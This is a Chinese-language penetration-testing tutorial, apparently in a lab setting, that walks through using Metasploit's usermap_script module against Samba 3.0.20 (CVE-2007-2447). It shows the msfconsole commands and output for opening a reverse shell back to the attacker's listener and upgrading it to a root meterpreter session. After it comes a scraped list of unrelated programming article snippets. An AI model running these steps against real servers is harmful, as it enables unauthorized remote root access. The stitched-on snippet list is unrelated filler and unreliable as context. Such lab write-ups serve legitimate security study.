Gatociego
Gatociego

0x04-1 服务器端exploitation-Samba 3.0.20-Debian

侵入一个linux服务器

msf > services -c port,info -p 135,445
Services
========

host            port  info
----            ----  ----
192.168.10.122  135   Microsoft Windows RPC
192.168.10.122  445   Windows 2003 (build:3790) (name:ROOT-TVI862UBEH) (workgroup:WORKGROUP )
192.168.10.128  135   Microsoft Windows RPC
192.168.10.128  445   Windows XP SP3 (language:English) (name:DH-CA8822AB9589) (workgroup:WORKGROUP )
192.168.10.254  445   Unix (Samba 3.0.20-Debian)

# 现在192.168.10.254这台服务器
到 https://www.cvedetails.com  查看Samba 3.0.20-Debian有没有对应cve编码
0x04-1 服务器端exploitation-Samba 3.0.20-Debian_第1张图片 
# 搜索对应的漏洞利用exploit
msf > search cve:2007 type:exploit samba

Matching Modules
================

   Name                                       Disclosure Date  Rank       Description
   ----                                       ---------------  ----       -----------
   exploit/linux/samba/lsa_transnames_heap    2007-05-14       good       Samba lsa_io_trans_names Heap Overflow
   exploit/multi/samba/usermap_script         2007-05-14       excellent  Samba "username map script" Command Execution
   exploit/osx/samba/lsa_transnames_heap      2007-05-14       average    Samba lsa_io_trans_names Heap Overflow
   exploit/solaris/samba/lsa_transnames_heap  2007-05-14       average    Samba lsa_io_trans_names Heap Overflow


# 选择 rank为excellent,成功率大一些
msf > use exploit/multi/samba/usermap_script 
# 查看该exploit详细的信息
msf exploit(multi/samba/usermap_script) > info

       Name: Samba "username map script" Command Execution
     Module: exploit/multi/samba/usermap_script
   Platform: Unix
       Arch: cmd
 Privileged: Yes
    License: Metasploit Framework License (BSD)
       Rank: Excellent
  Disclosed: 2007-05-14

Provided by:
  jduck 

Available targets:
  Id  Name
  --  ----
  0   Automatic

Basic options:
  Name   Current Setting  Required  Description
  ----   ---------------  --------  -----------
  RHOST  192.168.10.254   yes       The target address
  RPORT  139              yes       The target port (TCP)

Payload information:
  Space: 1024

Description:
  This module exploits a command execution vulnerability in Samba 
  versions 3.0.20 through 3.0.25rc3 when using the non-default 
  "username map script" configuration option. By specifying a username 
  containing shell meta characters, attackers can execute arbitrary 
  commands. No authentication is needed to exploit this vulnerability 
  since this option is used to map usernames prior to authentication!

References:
  https://cvedetails.com/cve/CVE-2007-2447/
  OSVDB (34700)
  http://www.securityfocus.com/bid/23972
  http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=534
  http://samba.org/samba/security/CVE-2007-2447.html

# 设置参数并执行
msf exploit(multi/samba/usermap_script) > set rhost 192.168.10.254
rhost => 192.168.10.254
msf exploit(multi/samba/usermap_script) > exploit 

[*] Started reverse TCP double handler on 192.168.10.115:4444 
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo EPsE8hpgZPCxacgE;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "EPsE8hpgZPCxacgE\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 1 opened (192.168.10.115:4444 -> 192.168.10.254:58722) at 2018-12-05 18:09:12 +0800

# 这里就获取了一个session,执行一个命令
ifconfig
eth0      Link encap:Ethernet  HWaddr 00:0c:29:7f:de:bf  
          inet addr:10.10.10.254  Bcast:10.10.10.255  Mask:255.255.255.0
          inet6 addr: fe80::20c:29ff:fe7f:debf/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:38716 errors:0 dropped:0 overruns:0 frame:0
          TX packets:547 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:2543677 (2.4 MB)  TX bytes:72178 (70.4 KB)
          Interrupt:17 Base address:0x2000 

eth1      Link encap:Ethernet  HWaddr 00:0c:29:7f:de:c9  
          inet addr:192.168.10.254  Bcast:192.168.10.255  Mask:255.255.255.0
          inet6 addr: fe80::20c:29ff:fe7f:dec9/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:47084 errors:1 dropped:1 overruns:0 frame:0
          TX packets:9312 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:3330608 (3.1 MB)  TX bytes:1689578 (1.6 MB)
          Interrupt:18 Base address:0x2080 

lo        Link encap:Local Loopback  
          inet addr:127.0.0.1  Mask:255.0.0.0
          inet6 addr: ::1/128 Scope:Host
          UP LOOPBACK RUNNING  MTU:16436  Metric:1
          RX packets:4956 errors:0 dropped:0 overruns:0 frame:0
          TX packets:4956 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0 
          RX bytes:2376272 (2.2 MB)  TX bytes:2376272 (2.2 MB)

# 退出session,并不是关闭session
Ctrl + Z

^Z
Background session 1? [y/N]  y
msf exploit(multi/samba/usermap_script) > 

# 查看 sessions的使用手册
msf exploit(multi/samba/usermap_script) > sessions -h
Usage: sessions [options] or sessions [id]

Active session manipulation and interaction.

OPTIONS:

    -C   Run a Meterpreter Command on the session given with -i, or all
    -K        Terminate all sessions
    -S   Row search filter.
    -c   Run a command on the session given with -i, or all
    -d        List all inactive sessions
    -h        Help banner
    -i   Interact with the supplied session ID
    -k   Terminate sessions by session ID and/or range
    -l        List all active sessions
    -n   Name or rename a session by ID
    -q        Quiet mode
    -s   Run a script or module on the session given with -i, or all
    -t   Set a response timeout (default: 15)
    -u   Upgrade a shell to a meterpreter session on many platforms
    -v        List all active sessions in verbose mode
    -x        Show extended information in the session table

Many options allow specifying session ranges using commas and dashes.
For example:  sessions -s checkvm -i 1,3-5  or  sessions -k 1-2,5,6

# 直接执行sessions,查看当前所有可使用的sessions
msf exploit(multi/samba/usermap_script) > sessions 

Active sessions
===============

  Id  Name  Type            Information  Connection
  --  ----  ----            -----------  ----------
  1         shell cmd/unix               192.168.10.115:4444 -> 192.168.10.254:58722 (192.168.10.254)

# 连接一个session
msf exploit(multi/samba/usermap_script) > sessions -i 1
[*] Starting interaction with 1...

# 关闭session
Crtl + C

^C
Abort session 1? If not, the foreground process in the session will be killed [y/N]  y
""

[*] 192.168.10.254 - Command shell session 1 closed.  Reason: User exit

关于payload

攻击负载
exploit 就像一把钥匙,打开一个门,打开门之后的行为就需要payload

执行 show payload,默认情况msf会自动选择一个payload
Payload options (cmd/unix/reverse):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.10.115   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port

默认使用的是cmd/unix/reverse 就是通过4444端口反弹一个shell,一般情况下这个shell的功能有限,需要将这个shell升级为meterpreter session

# 通过指令升级shell
sessions -u session_id

msf exploit(multi/samba/usermap_script) > sessions -u 1
[*] Executing 'post/multi/manage/shell_to_meterpreter' on session(s): [1]

[*] Upgrading session ID: 1
[*] Starting exploit/multi/handler
[*] Started reverse TCP handler on 192.168.10.115:4433 
[*] Sending stage (861480 bytes) to 192.168.10.254
[*] Meterpreter session 2 opened (192.168.10.115:4433 -> 192.168.10.254:42658) at 2018-12-05 18:20:07 +0800
[*] Command stager progress: 100.00% (773/773 bytes)

# 查看sessions

msf exploit(multi/samba/usermap_script) > sessions 

Active sessions
===============

  Id  Name  Type                   Information                                                Connection
  --  ----  ----                   -----------                                                ----------
  1         shell cmd/unix                                                                    192.168.10.115:4444 -> 192.168.10.254:39390 (192.168.10.254)
  2         meterpreter x86/linux  uid=0, gid=0, euid=0, egid=0 @ metasploitable.localdomain  192.168.10.115:4433 -> 192.168.10.254:42658 (192.168.10.254)

你可能感兴趣的:(0x04-1 服务器端exploitation-Samba 3.0.20-Debian)

  • 关于虚拟机下安装CentOS7及C++开发环境的搭建 dllmayday C++
    由于平时工作的环境就是在服务器端的CentOS上进行C++的开发,所以周末闲来无事就在自己的电脑上安装了虚拟机,然后再虚拟机上安装的CentOS的操作系统。虚拟机软件用的是VMwareworkstation12版本的,安装按照引导直接进行安装即可,没有太大的问题。产品密钥可以在网上找。虚拟机安装完之后接下来是CentOS7系统的安装。CentOS系统是RedHat系统的开源系统,在Linux的各个
  • 如何安装配置Goland并使用固定公网地址SSH远程连接本地服务器 君兮_ cpolar商业文windows
    文章目录1.安装配置GoLand2.服务器开启SSH服务3.GoLand本地服务器远程连接测试4.安装cpolar内网穿透远程访问服务器端4.1服务器端安装cpolar4.2创建远程连接公网地址5.使用固定TCP地址远程开发本文主要介绍使用GoLand通过SSH远程连接服务器,并结合cpolar内网穿透工具实现远程办公。GoLand是由JetBrains推出的一款专为Go语言开发设计的集成开发环境
  • 无法向会话状态服务器发出会话状态请求。请确保 ASP.NET State Service (ASP.NET 状态服务)已启动,并且客户端端口与服务器端口相同。如果服务器位于远程计算机上,请检查 ... Allen_f58e
    无法向会话状态服务器发出会话状态请求。请确保ASP.NETStateService(ASP.NET状态服务)已启动,并且客户端端口与服务器端口相同。如果服务器位于远程计算机上,请检查HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\aspnet_state\Parameters\AllowRemoteConnection的值,确保服务器接受远
  • C#、ASP、ASP.NET、.NET、ASP.NET CORE区别、ASP.NET Core其概念和特点、ASP.NET Core个人心得体会 lijingguang C#c#
    C#是一种面向对象的编程语言,主要用于开发跨平台的应用程序。它是.NET框架的一部分,并且可以在.NET平台上运行。ASP(ActiveServerPages)是一种用于构建动态Web页面的技术,使用VBScript或JScript作为服务器端脚本语言。它是早期的Microsoft技术,现已逐渐过时。ASP.NET是微软推出的下一代Web应用程序开发技术,它提供了更强大、更高效的功能和工具。ASP
  • SpringBoot整合Hazelcast实现分布式缓存 已转行此号停用 个人技术分享
    一.分布式缓存代码实现步骤1.创建web项目我们按照之前的经验,创建一个web程序,并将之改造成SpringBoot项目,具体过程略。2.添加依赖包com.hazelcasthazelcastcom.hazelcasthazelcast-spring3.创建application.yml配置文件创建application.yml配置文件,可以在这里设置服务器端口号。server:port:8081
  • web开发-PHP基础学习 前端薛之谦... PHPphpweb开发
    PHP是什么PHP是一种创建动态交互性站点的强有力的服务器端脚本语言。PHP是免费的,并且使用非常广泛。同时,对于像微软ASP这样的竞争者来说,PHP无疑是另一种高效率的选项。PHP开发环境集成安装通常,PHP集成环境包,都会将Apache、Ngnix、PHP、MySQL集成在一起,给用户一个非常简单的解决方案。并且大多数情况下:php版本是允许切换的。MySQL一般都是提供phpMyAdmin网
  • JSP与Servlet的区别 氨基钠
    基本概念ServletServlet是一种服务器端的Java应用程序,具有独立于平台和协议的特性,可以生成动态的Web页面。它担当客户请求(Web浏览器或其他HTTP客户程序)与服务器响应(HTTP服务器上的数据库或应用程序)的中间层。Servlet是位于Web服务器内部的服务器端的Java应用程序,与传统的从命令行启动的Java应用程序不同,Servlet由Web服务器进行加载,该Web服务器必
  • 2023年收入最高的10种编程语言之6-10名 qintian0225 swiftphprustkotlintypescript
    以下均来自相关资料,不代表任何个人观点。根据DevJobsScanner对2023年编程语言市场的分析,以下是收入最高的10种编程语言之6-10名:第十名--PHPPHP是一种广泛用于Web开发的服务器端脚本语言。PHP开发人员的平均年薪约为7.5万美元。第九名--TypeScriptTypeScript是JavaScript的一个超集,添加了静态类型检查等特性,提高了代码的可维护性和可读性。Ty
  • Node.js概述与安装运行浅记 dami_king 随笔node.js前端html5开发语言
    Node.js概述Node.js是一个开源、跨平台的JavaScript运行环境,用于在服务器端执行JavaScript代码。它不是一门新的编程语言,而是基于Google的V8JavaScript引擎构建的一个平台,允许开发者使用JavaScript编写服务器端应用。Node.js采用了异步非阻塞I/O模型,非常适合开发高性能、可扩展的网络应用,尤其是数据密集型实时应用(如聊天室、游戏后台服务、实
  • CentOs虚拟机下openGauss的配置使用 renxyz centoslinux运维openGauss
    CentOs虚拟机下opengauss的配置使用环境说明虚拟机平台VMware服务器端CentOS7.9本机系统Windows10部署版本OpenGauss1.1.0安装详细步骤虚拟机VMware本机已配置,该部分省略CentOS7.9安装下载镜像源CentOS-7-x86_64-DVD-2009.iso虚拟机中选中镜像进行安装设置内存设置为2GB处理器设置为2网络默认即可声卡和打印机不使用直接进
  • 【Node.js从基础到高级运用】一、了解Node.js基础概念 Vip_wk node.jsjavascript
    Node.js入门:基础概念解析欢迎来到Node.js的世界!如果你是一名开发者,不论是初出茅庐还是有着丰富的前端经验,了解Node.js都是一个令人兴奋的旅程。在这篇博客文章中,我们将深入探讨Node.js的基础概念,帮助你建立起对这个强大平台的初步理解。什么是Node.js?Node.js是一个开源、跨平台的JavaScript运行环境,它允许开发者使用JavaScript来编写服务器端代码。
  • RabbitMQ、kafaka、rocketmq等消息队列MQ消息堆积如何解决 思静语 消息队列MQrabbitmqrocketmq分布式kafka
    文章目录概述解决方案消息堆积如何处理如何解决消息队列的延时以及过期失效问题?消息队列满了以后该怎么处理?有几百万消息持续积压几小时,怎么办?概述1.产生背景:生产者投递消息的速率与我们消费者消费的速率完全不匹配。2.生产者投递消息的速率>消费者消费的速率导致我们消息会堆积在我们mq服务器端中,没有及时的被消费者消费所以就会产生消息堆积的问题3.注意的是:rabbitmq消费者我们的消息消费如果成功
  • 问题:JavaWeb中实现文件上传的方式有哪些? 张起灵的小可爱啊
    上回我们说了下文件下载的方式有哪些,这次我们从不同的环境下简单来说说文件上传的方式有哪些。文件上传的方式Servlet2.5方式Servlet3.0方式SpringMVC方式案例实操Servlet2.5方式文件上传涉及到前台页面的编写和后台服务器端代码的编写,前台发送文件,后台接收并保存文件,这才是一个完整的文件上传。1)前台页面在做文件上传的时候,会有一个上传文件的界面,首先我们需要一个表单,并
  • 关于HTML5表单验证的方法教程 猿小白klp htmlaxioshtml5前端html后端学习
    简介HTML5表单验证是一种在客户端对用户输入进行验证的方法,可以有效地减少对于服务器端验证的依赖。通过使用HTML5表单验证,可以为用户提供实时的错误提示和更好的用户体验。本教程将介绍如何在HTML5中使用各种验证属性和技术来实现表单验证。基本表单结构首先,我们来创建一个基本的表单结构,包括输入字段和提交按钮。以下是一个简单的例子:姓名:邮箱:密码:在上面的代码中,我们创建了一个包含姓名、邮箱和
  • Java实战:Spring MVC请求转发与重定向的实现及区别 拥抱AI javaspringmvc
    本文将详细介绍如何在SpringMVC中实现请求转发和重定向,并探讨二者的区别。我们将通过具体示例来演示如何在SpringMVC应用程序中使用这两种技术。本文适合已经具备SpringMVC基础知识的开发者阅读,以加深对SpringMVC中请求处理机制的理解。一、引言在Web应用程序中,请求转发和重定向是两种常见的页面跳转方式。请求转发发生在服务器端,而重定向则发生在客户端。SpringMVC为开发
  • ionic应用自动升级 DLLCNX 前端Android
    正文升级是应用最基本的功能,因为很少有一个应用发布后不在进行后期维护!原生应用的升级比较常见,但是如今混合应用大热,因为项目,我就基于ionic框架实现了一个简单的升级,根据服务器端返回来确定强制还是非强制更新.插件安装file(访问文件)ioniccordovapluginaddcordova-plugin-filenpminstall--save@ionic-native/fileFileTr
  • js模块化标准CommonJS 与AMD,CMD的区别 leo_xl
    CommonJS是nodejs中服务器端的规范范畴,AMD,CMD是客户端浏览器的范畴AMD是RequireJS在推广过程中对模块定义的规范化产出。CMD是SeaJS在推广过程中对模块定义的规范化产出。(淘宝大牛玉伯)对于依赖的模块,AMD是提前执行,CMD是延迟执行,requirejs从2.0开始也可以延迟执行CMD推崇依赖就近,AMD推崇依赖前置,比如:CMD会在方法中引用,而AMD则在头部d
  • 用PHP操作http中Etag、lastModified和Expires标签 金星show
    客户端通过浏览器发出第一次请求某一个URL时,根据HTTP协议的规定,浏览器会向服务器传送报头(HttpRequestHeader),服务器端响应同时记录相关属性标记(HttpReponseHeader),服务器端的返回状态会是200,格式类似如下:1.HTTP/1.1200OK2.Date:Tue,03Mar201204:58:40GMT3.Content-Type:image/jpeg4.Co
  • 使用Node.js开发RESTful API JJCTO Node.jsnode.jsrestful后端
    在当今信息时代,不管是企业级应用还是个人项目,都离不开RESTfulAPI的使用。RESTfulAPI是现代web应用的基石,通过它,我们可以实现前后端的高效沟通和数据传输。而在开发RESTfulAPI的过程中,Node.js的强大功能和灵活性让其成为首选的开发工具之一。Node.js是基于ChromeV8引擎的JavaScript运行环境,它的出现使得JavaScript可以在服务器端运行,极大
  • GET和POST两种HTTP 方法比较 阳阳大魔王 计算机网络http网络协议网络笔记网络安全计算机网络
    超文本传输协议(HTTP)的设计目的是保证客户端与服务器之间的通信。工作方式是客户端与服务器之间的请求-应答协议。举例:web浏览器可能是客户端,而计算机上的网络应用程序也可能作为服务器端。客户端(浏览器)向服务器提交HTTP请求;服务器向客户端返回响应。响应包含关于请求的状态信息以及可能被请求的内容。在客户机和服务器之间进行请求-响应时,两种最常被用到的方法是:GET和POST。GET-从指定的
  • http管道化 亮学长 http网络协议网络
    HTTP管道化(HTTPpipelining)是HTTP/1.1协议中的一项机制,允许客户端发送多个HTTP请求到服务器端,而无需等待每个请求的响应。通过HTTP管道化,客户端可以在单个TCP连接上发送多个请求,而服务器则可以并行处理这些请求,减少了请求-响应周期之间的等待时间,提高了传输效率和性能。下面是HTTP管道化的工作流程:客户端发起多个HTTP请求并将它们打包发送到服务器端,而无需等待响
  • (2018-05-19.Python从Zero到One)3、(爬虫)动态HTML处理和机器图像识别__1.3.8尝试对知乎网验证码进行识别处理 lyh165
    尝试对知乎网验证码进行处理:许多流行的内容管理系统即使加了验证码模块,其众所周知的注册页面也经常会遭到网络机器人的垃圾注册。那么,这些网络机器人究,竟是怎么做的呢?既然我们已经,可以成功地识别出保存在电脑上的验证码了,那么如何才能实现一个全能的网络机器人呢?大多数网站生成的验证码图片都具有以下属性。它们是服务器端的程序动态生成的图片。验证码图片的src属性可能和普通图片不太一样,比如,但是可以和其
  • CORS 和 JSONP 解决跨域问题 如光凌清尘
    由于浏览器的同源策略,不同协议、域名、端口的网页是不允许互相请求资源的。但在前后端分离的开发模式中,前后端的域名是不一样的,如果要进行数据的交互就会产生跨域。解决跨域的方案:一:cors设置请求头浏览器的同源安全策略默认会阻止网页“跨域”获取资源。但如果接口服务器配置了CORS相关的HTTP响应头,就可以解除浏览器端的跨域访问限制CORS主要在服务器端进行配置。客户端浏览器无须做任何额外的配置,即
  • 性能测试手册:一分钟掌握LoadRunner关联函数应该放在那 Criss陈磊
    为什么要有关联函数如果客户端的某个请求是随着服务器端的响应而动态变化,我们就需要用到关联,通过关联函数获取动态的返回值,传给后面的函数使用,完成测试上下文的流程串联。定义:在脚本回放过程中,客户端发出请求,通过关联函数所定义的左右边界值(也就是关联规则),在服务器返回的响应内容中查找,得到相应的值,将其存储的变量中,后续请求再通过对应变量指向的内存取出数据发给服务器发,已完成正确的业务流程的性能测
  • ECMAScript学习 qianxun0921
    ECMAScript它是一种由ECMA组织(前身为欧洲计算机制造商协会)制定和发布的脚本语言规范而我们学的JavaScript是ECMA的实现,但术语ECMAScript和JavaScript平时表达同一个意思JS包含三个部分:1).ECMAScript(核心)2).扩展==>浏览器端*BOM(浏览器对象模型)*DOM(文档对象模型)3).扩展==>服务器端*NodeES的几个重要版本ES5:09
  • PHP文章采集技巧:轻松获取优质内容 wanghui19880909 采集文章联网
    1.什么是文章采集文章采集是指通过程序自动抓取互联网上的文章内容,并将其保存到数据库或文件中的过程。这样做的好处是可以节省人工复制粘贴的时间,提高工作效率。2.PHP的优势PHP是一种流行的服务器端脚本语言,具有简单易学、灵活性高以及强大的文本处理能力等优势。这使得PHP成为进行文章采集的理想选择。3.学习PHP文章采集的必要性随着信息爆炸时代的到来,人们需要从海量的互联网信息中获取有价值的内容。
  • 浅谈Websocket STATICHIT静砸 JavaScriptwebsockethttp服务器
    由于http存在⼀个明显的弊端(消息只能有客户端推送到服务器端,⽽服务器端不能主动推送到客户端),导致如果服务器如果有连续的变化,这时只能使⽤轮询,⽽轮询效率过低,并不适合。于是WebSocket被发明出来WebSocket是⼀种在Web应⽤程序中实现双向通信的协议。与传统的HTTP请求-响应模式不同,WebSocket提供了持久连接,使服务器能够主动向客户端推送数据,⽽不需要客户端发起请求。1.
  • 前后端交互 学习笔记程序员
    前后端交互前端是什么?前端是指与用户直接交互的部分,通常是指Web开发中的前端部分,也称为客户端或用户界面。前端开发涉及创建网站或应用程序的用户界面,包括网页的外观、布局、交互和功能。简单来说就是:用户的可见界面,数据展示在页面上呈现给用户。后端是什么?后端是指网站、应用程序或服务的背后部分,负责处理数据、逻辑和与数据库交互等任务。它包括服务器端技术、数据库和应用程序,确保系统的稳定性、安全性和性
  • SSR,云平台,ChatGPT——我的 2023 技术关键词
    前言2023年,因为换工作,启动新项目等原因,我对我的技术栈进行了比较大的更新,主要集中在这三个方向:SSR(ServerSideRendering,服务器端渲染)。之前我开发的项目基本上都是SPA(SinglePageApplication),比如Vue,但之后我会越来越多开始用Nuxt。由于基础设施的发展,以后SSR会更方便更好用。云平台。以前我大概买了3、4台云服务器用来做各种尝试,在上面各
  • JS模块化系统
    JS模块化系统随着JavaScript开发变得越来越广泛,命名空间和依赖关系变得越来越难以处理。人们已经开发出不同的解决方案以模块系统的形式来解决这个问题。CommonJS(CJS)CommonJS是一种同步加载模块的规范,主要用于服务器端的Node.js环境。//模块导出module.exports={//模块内容};//模块导入constmodule=require('module');top
  • 如何用ruby来写hadoop的mapreduce并生成jar包 wudixiaotie mapreduce
    ruby来写hadoop的mapreduce,我用的方法是rubydoop。怎么配置环境呢: 1.安装rvm:     不说了 网上有 2.安装ruby:     由于我以前是做ruby的,所以习惯性的先安装了ruby,起码调试起来比jruby快多了。 3.安装jruby:     rvm install jruby然后等待安
  • java编程思想 -- 访问控制权限 百合不是茶 java访问控制权限单例模式
    访问权限是java中一个比较中要的知识点,它规定者什么方法可以访问,什么不可以访问   一:包访问权限;   自定义包: package com.wj.control; //包 public class Demo { //定义一个无参的方法 public void DemoPackage(){ System.out.println("调用
  • [生物与医学]请审慎食用小龙虾 comsci 生物
         现在的餐馆里面出售的小龙虾,有一些是在野外捕捉的,这些小龙虾身体里面可能带有某些病毒和细菌,人食用以后可能会导致一些疾病,严重的甚至会死亡.....      所以,参加聚餐的时候,最好不要点小龙虾...就吃养殖的猪肉,牛肉,羊肉和鱼,等动物蛋白质     
  • org.apache.jasper.JasperException: Unable to compile class for JSP: 商人shang maven2.2jdk1.8
    环境: jdk1.8    maven  tomcat7-maven-plugin  2.0 原因: tomcat7-maven-plugin  2.0 不知吃 jdk 1.8,换成 tomcat7-maven-plugin  2.2就行,即     <plugin>
  • 你的垃圾你处理掉了吗?GC oloz GC
    前序:本人菜鸟,此文研究学习来自网络,各位牛牛多指教  1.垃圾收集算法的核心思想   Java语言建立了垃圾收集机制,用以跟踪正在使用的对象和发现并回收不再使用(引用)的对象。该机制可以有效防范动态内存分配中可能发生的两个危险:因内存垃圾过多而引发的内存耗尽,以及不恰当的内存释放所造成的内存非法引用。   垃圾收集算法的核心思想是:对虚拟机可用内存空间,即堆空间中的对象进行识别
  • shiro 和 SESSSION 杨白白 shiro
    shiro 在web项目里默认使用的是web容器提供的session,也就是说shiro使用的session是web容器产生的,并不是自己产生的,在用于非web环境时可用其他来源代替。在web工程启动的时候它就和容器绑定在了一起,这是通过web.xml里面的shiroFilter实现的。通过session.getSession()方法会在浏览器cokkice产生JESSIONID,当关闭浏览器,此
  • 移动互联网终端 淘宝客如何实现盈利 小桔子 移動客戶端淘客淘寶App
           2012年淘宝联盟平台为站长和淘宝客带来的分成收入突破30亿元,同比增长100%。而来自移动端的分成达1亿元,其中美丽说、蘑菇街、果库、口袋购物等App运营商分成近5000万元。 可以看出,虽然目前阶段PC端对于淘客而言仍旧是盈利的大头,但移动端已经呈现出爆发之势。而且这个势头将随着智能终端(手机,平板)的加速普及而更加迅猛
  • wordpress小工具制作 aichenglong wordpress小工具
    wordpress 使用侧边栏的小工具,很方便调整页面结构 小工具的制作过程 1 在自己的主题文件中新建一个文件夹(如widget),在文件夹中创建一个php(AWP_posts-category.php) 小工具是一个类,想侧边栏一样,还得使用代码注册,他才可以再后台使用,基本的代码一层不变 <?php class AWP_Post_Category extends WP_Wi
  • JS微信分享 AILIKES js
    // 所有功能必须包含在 WeixinApi.ready 中进行    WeixinApi.ready(function(Api) {        // 微信分享的数据            var wxData = {       &nb
  • 封装探讨 百合不是茶 JAVA面向对象 封装
    //封装   属性 方法 将某些东西包装在一起,通过创建对象或使用静态的方法来调用,称为封装;封装其实就是有选择性地公开或隐藏某些信息,它解决了数据的安全性问题,增加代码的可读性和可维护性   在 Aname类中申明三个属性,将其封装在一个类中:通过对象来调用   例如   1: //属性 将其设为私有 姓名 name 可以公开
  • jquery radio/checkbox change事件不能触发的问题 bijian1013 JavaScriptjquery
    我想让radio来控制当前我选择的是机动车还是特种车,如下所示:  <html> <head> <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.7.1/jquery.min.js" type="text/javascript"><
  • AngularJS中安全性措施 bijian1013 JavaScriptAngularJS安全性XSRFJSON漏洞
            在使用web应用中,安全性是应该首要考虑的一个问题。AngularJS提供了一些辅助机制,用来防护来自两个常见攻击方向的网络攻击。 一.JSON漏洞         当使用一个GET请求获取JSON数组信息的时候(尤其是当这一信息非常敏感,
  • [Maven学习笔记九]Maven发布web项目 bit1129 maven
    基于Maven的web项目的标准项目结构 user-project     user-core     user-service     user-web        src      
  • 【Hive七】Hive用户自定义聚合函数(UDAF) bit1129 hive
    用户自定义聚合函数,用户提供的多个入参通过聚合计算(求和、求最大值、求最小值)得到一个聚合计算结果的函数。 问题:UDF也可以提供输入多个参数然后输出一个结果的运算,比如加法运算add(3,5),add这个UDF需要实现UDF的evaluate方法,那么UDF和UDAF的实质分别究竟是什么?   Double evaluate(Double a, Double b)  
  • 通过 nginx-lua 给 Nginx 增加 OAuth 支持 ronin47
    前言:我们使用Nginx的Lua中间件建立了OAuth2认证和授权层。如果你也有此打算,阅读下面的文档,实现自动化并获得收益。SeatGeek 在过去几年中取得了发展,我们已经积累了不少针对各种任务的不同管理接口。我们通常为新的展示需求创建新模块,比如我们自己的博客、图表等。我们还定期开发内部工具来处理诸如部署、可视化操作及事件处理等事务。在处理这些事务中,我们使用了几个不同的接口来认证: &n
  • 利用tomcat-redis-session-manager做session同步时自定义类对象属性保存不上的解决方法 bsr1983 session
    在利用tomcat-redis-session-manager做session同步时,遇到了在session保存一个自定义对象时,修改该对象中的某个属性,session未进行序列化,属性没有被存储到redis中。 在 tomcat-redis-session-manager的github上有如下说明: Session Change Tracking As noted in the &qu
  • 《代码大全》表驱动法-Table Driven Approach-1 bylijinnan java算法
    关于Table Driven Approach的一篇非常好的文章: http://www.codeproject.com/Articles/42732/Table-driven-Approach package com.ljn.base; import java.util.Random; public class TableDriven { public
  • Sybase封锁原理 chicony Sybase
           昨天在操作Sybase IQ12.7时意外操作造成了数据库表锁定,不能删除被锁定表数据也不能往其中写入数据。由于着急往该表抽入数据,因此立马着手解决该表的解锁问题。     无奈此前没有接触过Sybase IQ12.7这套数据库产品,加之当时已属于下班时间无法求助于支持人员支持,因此只有借助搜索引擎强大的
  • java异常处理机制 CrazyMizzz java
    java异常关键字有以下几个,分别为 try catch final throw throws 他们的定义分别为 try:    Opening exception-handling statement. catch:  Captures the exception. finally: Runs its code before terminating
  • hive 数据插入DML语法汇总 daizj hiveDML数据插入
    Hive的数据插入DML语法汇总1、Loading files into tables语法:1) LOAD DATA [LOCAL] INPATH 'filepath' [OVERWRITE] INTO TABLE tablename [PARTITION (partcol1=val1, partcol2=val2 ...)]解释:1)、上面命令执行环境为hive客户端环境下: hive>l
  • 工厂设计模式 dcj3sjt126com 设计模式
      使用设计模式是促进最佳实践和良好设计的好办法。设计模式可以提供针对常见的编程问题的灵活的解决方案。 工厂模式 工厂模式(Factory)允许你在代码执行时实例化对象。它之所以被称为工厂模式是因为它负责“生产”对象。工厂方法的参数是你要生成的对象对应的类名称。 Example #1 调用工厂方法(带参数) <?phpclass Example{ 
  • mysql字符串查找函数 dcj3sjt126com mysql
      FIND_IN_SET(str,strlist) 假如字符串str 在由N 子链组成的字符串列表strlist 中,则返回值的范围在1到 N 之间。一个字符串列表就是一个由一些被‘,’符号分开的自链组成的字符串。如果第一个参数是一个常数字符串,而第二个是type SET列,则   FIND_IN_SET() 函数被优化,使用比特计算。如果str不在strlist 或st
  • jvm内存管理 easterfly jvm
    一、JVM堆内存的划分 分为年轻代和年老代。年轻代又分为三部分:一个eden,两个survivor。 工作过程是这样的:e区空间满了后,执行minor gc,存活下来的对象放入s0, 对s0仍会进行minor gc,存活下来的的对象放入s1中,对s1同样执行minor gc,依旧存活的对象就放入年老代中; 年老代满了之后会执行major gc,这个是stop the word模式,执行
  • CentOS-6.3安装配置JDK-8 gengzg centos
    JAVA_HOME=/usr/java/jdk1.8.0_45 JRE_HOME=/usr/java/jdk1.8.0_45/jre PATH=$PATH:$JAVA_HOME/bin:$JRE_HOME/bin CLASSPATH=.:$JAVA_HOME/lib/dt.jar:$JAVA_HOME/lib/tools.jar:$JRE_HOME/lib export JAVA_HOME
  • 【转】关于web路径的获取方法 huangyc1210 Web路径
    假定你的web application 名称为news,你在浏览器中输入请求路径:  http://localhost:8080/news/main/list.jsp  则执行下面向行代码后打印出如下结果:  1、 System.out.println(request.getContextPath()); //可返回站点的根路径。也就是项
  • php里获取第一个中文首字母并排序 远去的渡口 数据结构PHP
    很久没来更新博客了,还是觉得工作需要多总结的好。今天来更新一个自己认为比较有成就的问题吧。 最近在做储值结算,需求里结算首页需要按门店的首字母A-Z排序。我的数据结构原本是这样的: Array ( [0] => Array ( [sid] => 2885842 [recetcstoredpay] =&g
  • java内部类 hm4123660 java内部类匿名内部类成员内部类方法内部类
          在Java中,可以将一个类定义在另一个类里面或者一个方法里面,这样的类称为内部类。内部类仍然是一个独立的类,在编译之后内部类会被编译成独立的.class文件,但是前面冠以外部类的类名和$符号。内部类可以间接解决多继承问题,可以使用内部类继承一个类,外部类继承一个类,实现多继承。      &nb
  • Caused by: java.lang.IncompatibleClassChangeError: class org.hibernate.cfg.Exten zhb8015
